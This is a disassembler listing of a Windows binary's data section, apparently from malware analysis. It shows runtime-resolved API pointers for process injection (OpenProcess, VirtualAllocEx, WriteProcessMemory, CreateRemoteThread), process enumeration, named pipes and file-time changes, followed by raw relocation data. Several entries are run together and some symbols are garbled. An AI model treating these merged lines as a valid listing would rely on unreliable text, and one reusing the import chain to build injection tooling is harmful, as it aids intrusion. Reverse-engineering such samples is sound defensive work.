dword_40FCAC dd 0 ; sub_40AE6F+E8�r ...
dword_40FCB0 dd 0 ; .text:004055A8�r ...
dword_40FCB4 dd 0 ; sub_409317+D�r ...
dword_40FCB8 dd 0 ; sub_40A555+10C�w ...
dword_40FCBC dd 0 ; sub_405B68+5C�r ...
dword_40FCC0 dd 0 ; sub_405A22+5A�r ...
dword_40FCC4 dd 0 ; .data:0040EB01�r ...
dword_40FCC8 dd 0 ; .data:0040EAE6�r ...
dword_40FCCC dd 0 ; .data:0040EB37�r ...
dword_40FCD0 dd 0 ; sub_40E758+286�r ...
dword_40FCD4 dd 0 ; sub_405A22+D�r ...
dword_40FCD8 dd 0 ; sub_405A22+40�r ...
dword_40FCDC dd 0 ; sub_405A22+4E�r ...
dword_40FCE0 dd 0 ; sub_40826C+125�r
dword_40FCE4 dd 0 ; sub_4086F4+66�r ...
dword_40FCE8 dd 0 ; sub_407A35+170�r ...
dword_40FCEC dd 0 ; sub_405A8C+61�r ...
dword_40FCF0 dd 0 ; sub_405AF7+23�r ...
dword_40FCF4 dd 0 ; sub_405A8C+4A�r ...
dword_40FCF8 dd 0 ; sub_407A35+B4�r ...
dword_40FCFC dd 0 ; sub_407BDB+31B�r ...
dword_40FD00 dd 0 ; sub_407BDB+32C�r ...
dword_40FD04 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_404D6D+3B�r ...
dword_40FD08 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_404D6D+34�r ...
dword_40FD0C dd 5 dup(0) ; sub_41BFFA+EE�o
dword_40FD20 dd 0 ; sub_41C198+1D1�w ...
dword_40FD24 dd 0 ; .text:0040529C�o ...
dword_40FD28 dd 0 ; sub_41BFFA+11A�w
dword_40FD2C dd 0 ; sub_41BFFA+120�w
dword_40FD30 dd 7C800000h ; sub_4087B5+85�r ...
dword_40FD34 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineA ; .text:0040523A�r ...
dword_40FD38 dd 7C830B14h ; resolved to->KERNEL32.GetLogicalDrives ; sub_403EB7+3B�r ...
dword_40FD3C dd 7C80B2D0h ; resolved to->KERNEL32.GetDriveTypeW ; sub_403EB7+75�r ...
dword_40FD40 dd 7C810A09h ; resolved to->KERNEL32.GetFileSizeEx ; sub_409BD4+3C�r ...
dword_40FD44 dd 7C80938Eh ; resolved to->KERNEL32.CreateFileMappingW ; sub_409BD4+72�r ...
dword_40FD48 dd 7C80B905h ; resolved to->KERNEL32.MapViewOfFile ; sub_409BD4+92�r ...
dword_40FD4C dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFile ; sub_409C8A+C�r ...
dword_40FD50 dd 7C80A03Bh ; resolved to->KERNEL32.ResetEvent ; .text:0040D32D�r ...
dword_40FD54 dd 7C8350BFh ; resolved to->KERNEL32.GetTimeZoneInformation ; sub_40B4A0+60�r ...
dword_40FD58 dd 7C80AE65h ; resolved to->KERNEL32.GetVersionExW ; sub_40B4A0+A2�r ...
dword_40FD5C dd 7C813070h ; resolved to->KERNEL32.GetUserDefaultUILanguage ; sub_40AAD4:loc_40AC5F�r ...
dword_40FD60 dd 7C80ABC1h ; resolved to->KERNEL32.GetProcessHeap ; sub_40AAA0:loc_40AAAF�r ...
dword_40FD64 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; sub_404308+E�r
dword_40FD68 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_403CC8+1B9�r ...
dword_40FD6C dd 7C82F873h ; resolved to->KERNEL32.CopyFileW ; .text:00405408�r ...
dword_40FD70 dd 7C80B3D5h ; resolved to->KERNEL32.GetModuleFileNameW ; .text:004053B0�r ...
dword_40FD74 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_40B4A0+51�r ...
dword_40FD78 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; .text:004052AA�r ...
dword_40FD7C dd 7C80E8B7h ; resolved to->KERNEL32.CreateMutexW ; sub_404222+91�r ...
dword_40FD80 dd 7C80E995h ; resolved to->KERNEL32.OpenMutexW ; sub_406E98+46�r ...
dword_40FD84 dd 7C8024A7h ; resolved to->KERNEL32.ReleaseMutex ; sub_409B7F+4�r ...
dword_40FD88 dd 7C80A996h ; resolved to->KERNEL32.lstrcmpiW ; sub_404034+73�r ...
dword_40FD8C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiA ; sub_40681A+82�r ...
dword_40FD90 dd 7C809A09h ; resolved to->KERNEL32.lstrlenW ; sub_4033DA+9E�r ...
dword_40FD94 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_403C06+47�r ...
dword_40FD98 dd 7C80BA64h ; resolved to->KERNEL32.lstrcpyW ; sub_403956+4E�r ...
dword_40FD9C dd 7C80B9EFh ; resolved to->KERNEL32.lstrcpynWdword_40FDA0 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_406383+19�r ...
dword_40FDA4 dd 7C810F32h ; resolved to->KERNEL32.lstrcatW ; sub_4033DA+97�r ...
dword_40FDA8 dd 7C834D41h ; resolved to->KERNEL32.lstrcatAdword_40FDAC dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_4034E8+94�r ...
dword_40FDB0 dd 7C831F31h ; resolved to->KERNEL32.DeleteFileW ; sub_409B2C+10�r ...
dword_40FDB4 dd 7C8314D5h ; resolved to->KERNEL32.SetFileAttributesW ; .text:00405417�r ...
dword_40FDB8 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_403956+11A�r ...
dword_40FDBC dd 7C80A017h ; resolved to->KERNEL32.SetEvent ; sub_4056AC+3D�r ...
dword_40FDC0 dd 7C810760h ; resolved to->KERNEL32.CreateFileW ; sub_4034E8+4E�r ...
dword_40FDC4 dd 7C80A6A9h ; resolved to->KERNEL32.CreateEventW ; sub_4057EE+14�r ...
dword_40FDC8 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointer ; sub_4035F5:loc_40363F�r ...
dword_40FDCC dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; sub_4092F9+14�r ...
dword_40FDD0 dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeap ; sub_40A91F+1B�r ...
dword_40FDD4 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; sub_409317+13�r ...
dword_40FDD8 dd 7C83145Bh ; resolved to->KERNEL32.ConnectNamedPipe ; sub_4093FA+49�r ...
dword_40FDDC dd 7C82C664h ; resolved to->KERNEL32.WaitNamedPipeW ; sub_4095AA+3E�r ...
dword_40FDE0 dd 7C8313ECh ; resolved to->KERNEL32.SetNamedPipeHandleState ; sub_4095AA+71�r ...
dword_40FDE4 dd 7C82F0D4h ; resolved to->KERNEL32.CreateNamedPipeW ; sub_40A95F+4A�r ...
dword_40FDE8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_404624+2A�r ...
dword_40FDEC dd 7C81042Ch ; resolved to->KERNEL32.CreateRemoteThread ; sub_406DB8+5B�r ...
dword_40FDF0 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; .text:004054AC�r ...
dword_40FDF4 dd 7C80180Eh ; resolved to->KERNEL32.ReadFile ; sub_4035F5+61�r ...
dword_40FDF8 dd 7C832044h ; resolved to->KERNEL32.SetEndOfFile ; sub_405E38+1D5�r ...
dword_40FDFC dd 7C810A77h ; resolved to->KERNEL32.GetFileSize ; sub_4034E8+83�r ...
dword_40FE00 dd 7C812641h ; resolved to->KERNEL32.FlushFileBuffers ; .text:004054B5�r ...
dword_40FE04 dd 7C80A7D4h ; resolved to->KERNEL32.GetLocalTimedword_40FE08 dd 7C81269Fh ; resolved to->KERNEL32.DisconnectNamedPipe ; sub_4093FA+2A�r ...
dword_40FE0C dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemory ; sub_4065F4+10F�r ...
dword_40FE10 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_40412F+59�r ...
dword_40FE14 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshot ; sub_405127+1B�r ...
dword_40FE18 dd 7C863D2Ch ; resolved to->KERNEL32.Process32FirstW ; sub_405127+2B�r ...
dword_40FE1C dd 7C863EB7h ; resolved to->KERNEL32.Process32NextW ; sub_405127+78�r ...
dword_40FE20 dd 7C864177h ; resolved to->KERNEL32.Module32FirstW ; sub_406E36+31�r ...
dword_40FE24 dd 7C864314h ; resolved to->KERNEL32.Module32NextW ; sub_406E36+55�r ...
dword_40FE28 dd 7C86402Ah ; resolved to->KERNEL32.Thread32First ; sub_406C44+4E�r ...
dword_40FE2C dd 7C8640DEh ; resolved to->KERNEL32.Thread32Next ; sub_406C44+66�r ...
dword_40FE30 dd 7C81AE17h ; resolved to->KERNEL32.GetExitCodeProcess ; sub_406E98+DD�r ...
dword_40FE34 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_406DB8+24�r ...
dword_40FE38 dd 7C80B9A0h ; resolved to->KERNEL32.VirtualQueryEx ; sub_4067A0+19�r ...
dword_40FE3C dd 7C809A72h ; resolved to->KERNEL32.VirtualAllocEx ; sub_4065F4+22�r ...
dword_40FE40 dd 7C801A5Dh ; resolved to->KERNEL32.VirtualProtectEx ; .text:00405202�r ...
dword_40FE44 dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessId ; sub_4048AF+76�r ...
dword_40FE48 dd 7C80C108h ; resolved to->KERNEL32.SetThreadPriority ; sub_4034E8+B4�r ...
dword_40FE4C dd 7C80A793h ; resolved to->KERNEL32.GetThreadPriority ; sub_4034E8+A6�r ...
dword_40FE50 dd 7C8098EBh ; resolved to->KERNEL32.GetCurrentThread ; sub_4034E8:loc_403585�r ...
dword_40FE54 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadIddword_40FE58 dd 7C802332h ; resolved to->KERNEL32.CreateProcessW ; sub_40B046+E5�r ...
dword_40FE5C dd 7C8352D9h ; resolved to->KERNEL32.GetProcessTimes ; sub_409D8E+19�r ...
dword_40FE60 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; sub_407164+108�r ...
dword_40FE64 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; sub_4048AF+128�r ...
dword_40FE68 dd 7C83565Bh ; resolved to->KERNEL32.MoveFileExW ; sub_403723+CB�r ...
dword_40FE6C dd 7C8323D2h ; resolved to->KERNEL32.CreateDirectoryW ; sub_409E6A+34�r ...
dword_40FE70 dd 7C830789h ; resolved to->KERNEL32.GetTempPathW ; sub_409DD4+15�r ...
dword_40FE74 dd 7C809E01h ; resolved to->KERNEL32.IsBadReadPtr ; sub_40681A+A�r ...
dword_40FE78 dd 7C910340h ; resolved to->NTDLL.RtlSetLastWin32Error ; sub_40E286+B0�r ...
dword_40FE7C dd 7C8021CCh ; resolved to->KERNEL32.ReadProcessMemorydword_40FE80 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSection ; sub_403B25+F�r ...
dword_40FE84 dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSection ; sub_403956+10�r ...
dword_40FE88 dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSection ; sub_403956+182�r ...
dword_40FE8C dd 7C80176Bh ; resolved to->KERNEL32.GetSystemTime ; sub_40325F+C4�r ...
dword_40FE90 dd 7C8359B7h ; resolved to->KERNEL32.GetTempFileNameW ; sub_409DD4+2C�r ...
dword_40FE94 dd 7C80EEE1h ; resolved to->KERNEL32.FindFirstFileW ; sub_403CC8+36�r ...
dword_40FE98 dd 7C80EF3Ah ; resolved to->KERNEL32.FindNextFileW ; sub_403CC8+1D1�r ...
dword_40FE9C dd 7C80EDD7h ; resolved to->KERNEL32.FindClose ; sub_403CC8+1E2�r ...
dword_40FEA0 dd 7C8316C7h ; resolved to->KERNEL32.GetComputerNameW ; sub_40AC72+F5�r ...
dword_40FEA4 dd 7C831CB8h ; resolved to->KERNEL32.SetFileTime ; .text:0040552C�r ...
dword_40FEA8 dd 7C831C45h ; resolved to->KERNEL32.GetFileTime ; .text:00405517�r ...
dword_40FEAC dd 7C80FF19h ; resolved to->KERNEL32.GlobalLock ; sub_40471E+30�r
dword_40FEB0 dd 7C80FE82h ; resolved to->KERNEL32.GlobalUnlock ; sub_40471E+B2�r
dword_40FEB4 dd 7C8305F6h ; resolved to->KERNEL32.ExpandEnvironmentStringsW ; sub_407028+32�r ...
dword_40FEB8 dd 0 ; sub_409B94+2E�w ...
dword_40FEBC dd 0 ; sub_409B94+E�w ...
byte_40FEC0 db 0 ; DATA XREF: sub_40B4A0+43�o
; sub_40B4A0+4A�w ...
align 4
dd 40h dup(0)
byte_40FFC4 db 0 ; DATA XREF: sub_40B4A0+CD�w
; sub_40B4A0:loc_40B574�w ...
byte_40FFC5 db 0 ; DATA XREF: sub_40B4A0+57�w
; sub_40B583+34�r ...
align 4
dword_40FFC8 dd 0 ; sub_40B4A0+76�w ...
dword_40FFCC dd 0 ; sub_41CAA9+11B�o
dword_40FFD0 dd 0 ; sub_41CAA9+12B�o
dword_40FFD4 dd 2 dup(0) ; sub_41CAA9+13A�o
word_40FFDC dw 0 ; DATA XREF: sub_40B4A0+8D�w
; sub_40B4A0+A8�o ...
align 10h
dd 5 dup(0)
db 2 dup(0)
dword_40FFF6 dd 0 ; sub_40B4A0+C6�r ...
align 4
dd 38h dup(0)
word_4100DC dw 0 ; DATA XREF: sub_40B4A0+9C�w
; sub_40B583+10B�o ...
align 10h
dword_4100E0 dd 82h dup(0) ; sub_40B583+204�o ...
dword_4102E8 dd 0 ; sub_40C53B+1�r ...
dword_4102EC dd 0 ; sub_40C53B+D�r ...
dword_4102F0 dd 0 ; sub_40CD45�r ...
dword_4102F4 dd 0 ; sub_40CD45+C�r ...
dword_4102F8 dd 6 dup(0) ; .data:0040E1BD�o ...
dword_410310 dd 6 dup(0) ; .data:0040E72A�o ...
dword_410328 dd 0 dword_41032C dd 0 dd 334h dup(0)
dd 2000h, 2D4h, 3A6C3A68h, 3A743A70h, 3A7C3A78h, 3A843A80h
dd 3A8C3A88h, 3A943A90h, 3A9C3A98h, 3AA43AA0h, 3AAC3AA8h
dd 3AB43AB0h, 3ABC3AB8h, 3AC43AC0h, 3ACC3AC8h, 3AD43AD0h
dd 3ADC3AD8h, 3AE43AE0h, 3AEC3AE8h, 3AF43AF0h, 3AFC3AF8h
dd 3B043B00h, 3B0C3B08h, 3B143B10h, 3B1C3B18h, 3B243B20h
dd 3B2C3B28h, 3B343B30h, 3B3C3B38h, 3B443B40h, 3B4C3B48h
dd 3B543B50h, 3B5C3B58h, 3B643B60h, 3B6C3B68h, 3B743B70h
dd 3B7C3B78h, 3B843B80h, 3B8C3B88h, 3B943B90h, 3B9C3B98h
dd 3BA43BA0h, 3BAC3BA8h, 3BB43BB0h, 3BBC3BB8h, 3BC43BC0h
dd 3BCC3BC8h, 3BD43BD0h, 3BDC3BD8h, 3BE43BE0h, 3BEC3BE8h
dd 3BF43BF0h, 3BFC3BF8h, 3C043C00h, 3C0C3C08h, 3C143C10h
dd 3C1C3C18h, 3C243C20h, 3C2C3C28h, 3C343C30h, 3C3C3C38h
dd 3C443C40h, 3C4C3C48h, 3C543C50h, 3C5C3C58h, 3C643C60h
dd 3C6C3C68h, 3C743C70h, 3C7C3C78h, 3C843C80h, 3C8C3C88h
dd 3C943C90h, 3C9C3C98h, 3CA43CA0h, 3CAC3CA8h, 3CB43CB0h
dd 3CBC3CB8h, 3CC43CC0h, 3CCC3CC8h, 3CD43CD0h, 3CDC3CD8h
dd 3CE43CE0h, 3CEC3CE8h, 3CF43CF0h, 3CFC3CF8h, 3D043D00h
dd 3D0C3D08h, 3D143D10h, 3D1C3D18h, 3D243D20h, 3D2C3D28h
dd 3D343D30h, 3D3C3D38h, 3D443D40h, 3D4C3D48h, 3D543D50h
dd 3D5C3D58h, 3D643D60h, 3D6C3D68h, 3D743D70h, 3D7C3D78h
dd 3D843D80h, 3D8C3D88h, 3D943D90h, 3D9C3D98h, 3DA43DA0h
dd 3DAC3DA8h, 3DB43DB0h, 3DBC3DB8h, 3DC43DC0h, 3DCC3DC8h
dd 3DD43DD0h, 3DDC3DD8h, 3DE43DE0h, 3DEC3DE8h, 3DF43DF0h
dd 3DFC3DF8h, 3E043E00h, 3E0C3E08h, 3E143E10h, 3E1C3E18h
dd 3E243E20h, 3E2C3E28h, 3E343E30h, 3E3C3E38h, 3E443E40h
dd 3E4C3E48h, 3E543E50h, 3E5C3E58h, 3E643E60h, 3E6C3E68h
dd 3E743E70h, 3E7C3E78h, 3E843E80h, 3E8C3E88h, 3E943E90h
dd 3E9C3E98h, 3EA43EA0h, 3EAC3EA8h, 3EB43EB0h, 3EBC3EB8h
dd 3EC43EC0h, 3ECC3EC8h, 3ED43ED0h, 3EDC3ED8h, 3EE43EE0h
dd 3EEC3EE8h, 3EF43EF0h, 3EFC3EF8h, 3F043F00h, 3F0C3F08h
dd 3F143F10h, 3F1C3F18h, 3F243F20h, 3F2C3F28h, 3F343F30h
dd 3F3C3F38h, 3F443F40h, 3F4C3F48h, 3F543F50h, 3F5C3F58h
dd 3F643F60h, 3F6C3F68h, 3F743F70h, 3F7C3F78h, 3F843F80h
dd 3F8C3F88h, 3F943F90h, 3F9C3F98h, 3FA43FA0h, 3FAC3FA8h
dd 3FB43FB0h, 3FBC3FB8h, 3FC43FC0h, 3FCC3FC8h, 3FD43FD0h
dd 3FDC3FD8h, 3FE43FE0h, 3FEC3FE8h, 3FF43FF0h, 3FFC3FF8h
dd 3000h, 1DCh, 30043000h, 300C3008h, 30143010h, 301C3018h
dd 30243020h, 302C3028h, 30343030h, 303C3038h, 30443040h
dd 304C3048h, 30543050h, 305C3058h, 30643060h, 306C3068h
dd 30743070h, 307C3078h, 30843080h, 308C3088h, 30943090h
dd 309C3098h, 30A430A0h, 30AC30A8h, 30B430B0h, 30BC30B8h
dd 30C430C0h, 30CC30C8h, 30D430D0h, 30DC30D8h, 30E430E0h
dd 30EC30E8h, 30F430F0h, 30FC30F8h, 31043100h, 310C3108h
dd 31143110h, 311C3118h, 31243120h, 312C3128h, 31343130h
dd 313C3138h, 31443140h, 314C3148h, 31543150h, 32753160h
dd 32AA3295h, 33253313h, 3351333Ch, 33913386h, 33B13399h
dd 33F533C1h, 34343420h, 344B3439h, 34733469h, 34AB347Ah
dd 34C934B6h, 34DE34D8h, 350834E9h, 35383526h, 35493540h
dd 356D354Eh, 357E3578h, 35903587h, 359E3598h, 35AF35A4h
dd 35C035B5h, 35D535C5h, 35E935E3h, 35F935F0h, 3641363Bh
dd 36583652h, 3685367Fh, 374E3734h, 37B03794h, 37C437B9h
dd 37F037C9h, 382A3809h, 38AB386Dh, 396238BBh, 39823968h
dd 39A63999h, 39BB39ABh, 39D739D1h, 3A6C39E9h, 3A853A72h
dd 3A963A8Bh, 3ADA3AD4h, 3B0E3AFCh, 3B1E3B14h, 3B303B2Bh
dd 3B3C3B36h, 3B5E3B43h, 3B993B75h, 3BC63BB0h, 3BF63BDDh
dd 3C103BFFh, 3C213C19h, 3C4F3C2Eh, 3CA23C96h, 3CB13CA8h
dd 3CE33CD3h, 3D163D00h, 3D753D64h, 3DA03D98h, 3DC93DABh
dd 3E033DE4h, 3E313E19h, 3E7B3E70h, 3E893E83h, 3EAC3E9Bh
dd 3ECA3EC3h, 3EEB3EDCh, 3F2E3EF4h, 3F633F4Eh, 3FB23FACh
dd 3FC23FB7h, 3FF03FDBh, 3FF8h, 4000h, 138h, 30183004h
dd 3064301Eh, 3090306Ah, 30A93097h, 30BF30B2h, 30E130CAh
dd 310330E7h, 3114310Eh, 313C3136h, 3152314Ch, 31823158h
dd 3195318Ah, 325B324Bh, 326E3262h, 32933282h, 32AF3299h
dd 32DC32B5h, 32E932E2h, 333E3318h, 33703347h, 3398337Ch
dd 33BE33B9h, 33EB33DAh, 33FE33F1h, 34923446h, 34D434A0h
dd 34E434D9h, 34FA34EDh, 3515350Fh, 35C535BFh, 35EB35E4h
dd 35FA35F3h, 360E3600h, 36183613h, 3644361Eh, 3650364Ah
dd 36753658h, 36A4369Eh, 36C636B8h, 36D636CCh, 36F436E8h
dd 370A3702h, 3715370Fh, 37503727h, 37733764h, 37A7378Fh
dd 37E037D2h, 37FC37EDh, 380A3803h, 38323826h, 384D383Ah
dd 38663856h, 38893880h, 3895388Fh, 38A938A2h, 38E438D9h
dd 390F38EBh, 3920391Ah, 392D3927h, 39743946h, 39A03988h
dd 39D939BEh, 3A353A09h, 3A933A64h, 3B753B63h, 3BAA3B9Eh
dd 3C5C3C4Fh, 3CCC3C84h, 3D173CECh, 3D433D3Ah, 3D5C3D51h
dd 3D8F3D78h, 3DAA3DA3h, 3E6F3E60h, 3F653F22h, 3FA2h, 5000h
dd 144h, 30DA30A7h, 3144310Fh, 31693154h, 31843174h, 31AD31A1h
dd 31CE31BEh, 31FE31EDh, 32093204h, 323C322Dh, 32933250h
dd 32A3329Dh, 32C132ACh, 32F732E3h, 33203308h, 335C3332h
dd 33763371h, 33D333B2h, 3419340Ah, 34493432h, 34B734AEh
dd 34D534D0h, 34FF34E6h, 352E3519h, 353E3535h, 356B354Dh
dd 358C3586h, 35AA35A1h, 35C735BEh, 35E435DFh, 3647361Bh
dd 36763656h, 36C03684h, 36E536D5h, 370736EBh, 37193714h
dd 37323725h, 37433737h, 3754374Fh, 3785376Bh, 379F3792h
dd 37CD37C4h, 380437D3h, 380F3809h, 382D3828h, 384A3844h
dd 385A3852h, 3872386Ch, 3882387Ah, 388F3887h, 38B1389Dh
dd 38D938C4h, 38F038DEh, 390738F5h, 392B390Dh, 3948393Fh
dd 39653960h, 39893981h, 399C398Fh, 39C839AFh, 39E039CDh
dd 39EC39E6h, 39F839F2h, 3A0439FEh, 3A123A0Ah, 3A643A31h
dd 3A7E3A72h, 3AEF3AD8h, 3BB33B1Ch, 3BFA3BC6h, 3C413C24h
dd 3CC13C77h, 3D223CF5h, 3D573D3Ah, 3D963D7Ah, 3DD53D9Dh
dd 3E533DF5h, 3E6C3E58h, 3E9C3E85h, 3F973EC3h, 6000h, 0DCh
dd 300F3006h, 303D3031h, 3086304Bh, 30B830ABh, 30D030C3h
dd 30E630D9h, 310330F1h, 313F3120h, 315E3154h, 31E53164h
dd 321D3216h, 32B6327Eh, 32DE32BDh, 33373325h, 339E338Ah
dd 345B33B6h, 34D53495h, 35513540h, 356F355Ah, 35D235B9h
dd 362F3618h, 370536EBh, 37433718h, 377C3763h, 37E337BBh
dd 380A37F6h, 384D3826h, 3880386Ah, 38AE389Eh, 390138BFh
dd 39573951h, 39863980h, 39A93996h, 3ABE39D2h, 3C5E3B17h
dd 3C943C7Ch, 3CB73CACh, 3CFB3CC5h, 3D673D4Bh, 3D953D79h
dd 3DDE3DADh, 3E153DF0h, 3E283E1Ch, 3E543E42h, 3E8D3E69h
dd 3EEB3EE0h, 3F133F01h, 3F223F19h, 3F3F3F28h, 3F6C3F60h
dd 3F843F77h
dd 3FAF3F95h, 3FE73FCDh, 7000h, 0F0h, 3077305Ch, 30AE308Ah
dd 30D630CBh, 30EE30E2h, 310630FAh, 31C631A1h, 31E331D1h
dd 326E3201h, 32E632D1h, 32F532EEh, 33443302h, 33EB33E5h
dd 3458341Ch, 34A23488h, 34F734ADh, 352234FDh, 357C3563h
dd 3591358Ah, 35A6359Eh, 35BB35B3h, 35D035C8h, 35E535DDh
dd 35FA35F2h, 360F3607h, 366C361Ch, 367F3678h, 36A4368Ch
dd 36B736B0h, 36CC36C4h, 36E136D9h, 36F636EEh, 370B3703h
dd 37203718h, 3735372Dh, 374A3742h, 37EC3757h, 38223814h
dd 38BB382Ch, 399B393Dh, 3AD83AA4h, 3B053AEBh, 3B5B3B48h
dd 3BA73B8Fh, 3BC13BAEh, 3BCE3BC8h, 3C883C45h, 3D5A3D39h
dd 3D903D75h, 3DE83DB3h, 3EA93EA0h, 3EF83EAFh, 3F323F09h
dd 3F5F3F4Ah, 3F7E3F68h, 3F973F89h, 3FA63F9Fh, 3FD03FBEh
dd 3FE8h, 8000h, 110h, 304E3024h, 306D3057h, 312C3074h
dd 31D43144h, 32533208h, 3262325Ch, 32893282h, 329A3293h
dd 32AB32A4h, 334E32DFh, 33A03393h, 33BA33AFh, 33C933C0h
dd 33E533DFh, 340733FBh, 343C341Dh, 34513445h, 347C346Bh
dd 34B8348Eh, 34E334D3h, 350334F0h, 359C3596h, 35E535D1h
dd 362535FDh, 3689364Eh, 36AE3697h, 36DE36CDh, 373036FEh
dd 3762375Ch, 37733768h, 37843779h, 3795378Ah, 37A5379Bh
dd 37D337CCh, 37EE37DAh, 37FB37F6h, 38133805h, 382D3820h
dd 3846383Ch, 385E384Eh, 386C3866h, 38803876h, 389A3887h
dd 38AF38A9h, 38BF38B9h, 38CD38C7h, 38D938D3h, 390938DEh
dd 398F3940h, 39C43995h, 3A1C3A10h, 3A373A2Fh, 3A4D3A3Eh
dd 3A753A5Fh, 3A9E3A90h, 3AD43AC1h, 3B083AFBh, 3B413B34h
dd 3B803B6Ah, 3BC63BBDh, 3C263C12h, 3C403C34h, 3C4B3C45h
dd 3C893C71h, 3C993C93h, 3CA3h, 9000h, 0DCh, 319D3195h
dd 31C031B9h, 31EA31DBh, 322031F1h, 32633258h, 330F3309h
dd 332C3326h, 33E633DFh, 340C33F4h, 341E3412h, 34303426h
dd 346C3445h, 34D6348Fh, 35263508h, 3546353Eh, 35613557h
dd 357C3573h, 35A33595h, 360235EAh, 3639361Dh, 366C3652h
dd 36A23685h, 370736CFh, 39EF39C3h, 3B3E3B34h, 3B563B50h
dd 3B733B61h, 3B8F3B85h, 3B9C3B96h, 3BAA3BA3h, 3BFC3BC3h
dd 3C483C12h, 3C773C68h, 3C983C80h, 3CB43CA6h, 3CDD3CC4h
dd 3D333D0Dh, 3D673D60h, 3D883D7Ch, 3DB13DA9h, 3DEB3DCBh
dd 3E023DFBh, 3E3F3E1Eh, 3E913E80h, 3EAF3EA0h, 3ED33EC5h
dd 3EFB3EEAh, 3F313F0Dh, 3F6A3F40h, 3FA73F85h, 3FB93FAFh
dd 3FD43FC3h, 3FFF3FEEh, 0A000h, 180h, 30243013h, 303E3033h
dd 3057304Ah, 30793063h, 30913086h, 30A73096h, 30BF30B4h
dd 30D830D1h, 30EB30DDh, 30FF30F0h, 310E3104h, 31243119h
dd 3167314Eh, 31B33189h, 31EE31C9h, 32213206h, 324F3238h
dd 327B3259h, 32973282h, 32BB32A7h, 332A330Fh, 336C335Dh
dd 338C3386h, 33A8339Bh, 33DF33CBh, 343C341Ah, 3508348Fh
dd 35583531h, 356C355Dh, 357D3578h, 359F358Ch, 35B335A4h
dd 35C535C0h, 35E135D4h, 35F535E6h, 360C3607h, 3628361Bh
dd 363C362Dh, 3653364Eh, 36743662h, 36883679h, 369B3696h
dd 36B336AAh, 36C736B8h, 36DA36D5h, 371336E9h, 37603739h
dd 37D137ADh, 380A37F2h, 393638BDh, 39AB393Ch, 39D239C5h
dd 39F739ECh, 3A0C3A03h, 3A2D3A15h, 3A533A38h, 3A773A6Fh
dd 3A893A80h, 3AB73AB1h, 3AC23ABDh, 3AE43ACCh, 3B123B00h
dd 3B3C3B2Ah, 3B5E3B50h, 3B863B72h, 3B943B8Fh, 3BA03B99h
dd 3BAF3BA9h, 3BCA3BC3h, 3BE03BD4h, 3BF03BE6h, 3BFC3BF6h
dd 3C133C09h, 3C453C3Fh, 3C5B3C52h, 3C673C61h, 3CC53C7Ch
dd 3D063CF4h, 3D2B3D1Eh, 3D693D4Bh, 3D7C3D72h, 3D8C3D82h
dd 3DB23DA1h, 3DDC3DC9h, 3DF43DEBh, 3E453E18h, 3E813E68h
dd 3EB03E95h, 3ED23EC2h, 3EF43ED7h, 3F213F0Ch, 3F593F3Bh
dd 3FC33F78h, 3FFCh, 0B000h, 110h, 30153007h, 30333024h
dd 308C303Ah, 30A23093h, 30CD30B5h, 30E430DDh, 31113106h
dd 313C312Dh, 31793145h, 31E731C9h, 330D32FDh, 340D3345h
dd 34B834ADh, 34DA34CBh, 34EC34E4h, 34F834F3h, 35123502h
dd 35303518h, 3544353Eh, 354F3549h, 35673559h, 3576356Eh
dd 35A7359Bh, 35BA35B3h, 35F535E7h, 360735FCh, 36243610h
dd 3656364Bh, 369F368Fh, 36BE36AFh, 36EF36CBh, 370536FCh
dd 37423719h, 3768375Eh, 378E3788h, 37BC37ABh, 37F337D6h
dd 380F3808h, 381D3816h, 382E3829h, 38B6389Dh, 38D438C7h
dd 390138E6h, 392F390Eh, 396C3945h, 39BE3984h, 39EC39D6h
dd 3B8C39F7h, 3BA63B9Dh, 3BBC3BADh, 3BEA3BCAh, 3C273BFEh
dd 3CB93CA8h, 3CCC3CC0h, 3D103CE7h, 3D2F3D15h, 3D513D43h
dd 3D803D7Ah, 3DD23DCCh, 3E193DE0h, 3E793E5Eh, 3EAB3E9Ch
dd 3EF33ED2h, 3F0C3F04h, 3F203F13h, 3F4C3F2Dh, 0C000h
dd 0B8h, 3024301Fh, 303B3034h, 306D3058h, 30D83084h, 30E330DDh
dd 31323127h, 31463138h, 316C3160h, 321F3177h, 32A7322Bh
dd 32E232D5h, 330E32F9h, 33223313h, 339B3360h, 34683415h
dd 34E13480h, 3521351Ch, 352B3526h, 35363530h, 354A353Eh
dd 3579356Bh, 35B635A0h, 35C735BCh, 362A3621h, 36643633h
dd 367B3671h, 36A03699h, 36B236A9h, 371A370Fh, 3743373Ah
dd 37E93770h, 38773833h, 3AC0390Dh, 3B0D3AECh, 3B2C3B19h
dd 3CA33C62h, 3CF73CDEh, 3D533D46h, 3D6E3D67h, 3D873D82h
